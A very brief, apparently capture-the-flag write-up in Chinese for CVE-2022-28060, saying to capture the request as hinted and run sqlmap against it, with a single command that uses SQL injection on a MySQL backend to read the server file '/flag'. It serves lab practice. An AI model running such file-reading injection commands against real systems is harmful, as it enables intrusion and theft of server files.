CVE-2022-28060


根据提示抓包,用sqlmap跑

python sqlmap.py -r url.txt --file-read "/flag" --dbms mysql